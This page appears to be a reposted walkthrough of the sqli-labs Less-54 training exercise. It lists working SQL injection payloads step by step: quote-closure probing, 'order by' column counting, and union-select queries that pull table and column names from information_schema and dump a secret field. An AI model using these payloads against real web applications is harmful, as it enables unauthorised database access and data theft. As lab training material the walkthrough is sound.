当前位置:网站首页>SQL injection Less54 (limited number of SQL injection + union injection)
SQL injection Less54 (limited number of SQL injection + union injection)
2022-07-31 22:52:00 【HUAWEI CLOUD】
Limited number of SQL injections
Each reset, the table name of the database, field names and data will change
?id=1
?id=1'
No error message found
?id=1"
The echo is normal, check the closing method at the beginning of double quotation marks directly
?id=1'--+?id=1')--+?id=1'))--+
The single quote echo is normal, so it is closed by the single quote
?id=1' order by 3--+ The echo is normal?id=1' order by 4--+ The echo is wrong
So there are three columns
?id=-1' union select 1,version(),database()--+
?id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+
?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema="challenges" and table_name="470aojlrx1")--+
?id=-1' union select 1,2,(select group_concat(id,sessid,secret_KJU8,tryy) from 470aojlrx1)--+
边栏推荐
- BOW/DOM (top)
- 嵌入式开发没有激情了,正常吗?
- Judging decimal points and rounding of decimal operations in Golang
- iNeuOS industrial Internet operating system, equipment operation and maintenance business and "low-code" form development tools
- Recognize anomalies (you will understand after reading this)
- Quick Start Tutorial for flyway
- BM3 flips the nodes in the linked list in groups of k
- The latest masterpiece!Alibaba just released the interview reference guide (Taishan version), I just brushed it for 29 days
- linux view redis version command (linux view mysql version number)
- SQL注入 Less46(order by后的注入+rand()布尔盲注)
猜你喜欢
面试突击69:TCP 可靠吗?为什么?
ThreadLocal
日常--Kali开启SSH(详细教程)
Handwritten a simple web server (B/S architecture)
The latest masterpiece!Alibaba just released the interview reference guide (Taishan version), I just brushed it for 29 days
支付模块实现
Go mode tidy reports an error go warning “all” matched no packages
IDA PRO中汇编结构体识别
如何减少软件设计和实现之间鸿沟
flowable workflow all business concepts
随机推荐
Summary of the classic drawing method of histogram
[QNX Hypervisor 2.2用户手册]9.14 set
Fixed-length usage of nanopb string type based on RT1052 Aworks (27)
Binary tree non-recursive traversal
数据分析(一)——matplotlib
[NLP] What is the memory of the model!
Implementation of a sequence table
周总结
hboot and recovery, boot.img, system.img
Transfer Learning - Domain Adaptation
景区手绘地图的绘制流程
"SDOI2016" Journey Problem Solution
Daily practice——Randomly generate an integer between 1-100 and see how many times you can guess.Requirements: The number of guesses cannot exceed 7 times, and after each guess, it will prompt "bigger"
Golang - from entry to abandonment
ECCV 2022 Huake & ETH propose OSFormer, the first one-stage Transformer framework for camouflaging instance segmentation!The code is open source!...
Interview assault 69: TCP reliable?Why is that?
How to get useragent
10大主流3D建模技术
Several methods for deleting specified elements in Golang slices
AI automatic code writing plugin Copilot (co-pilot)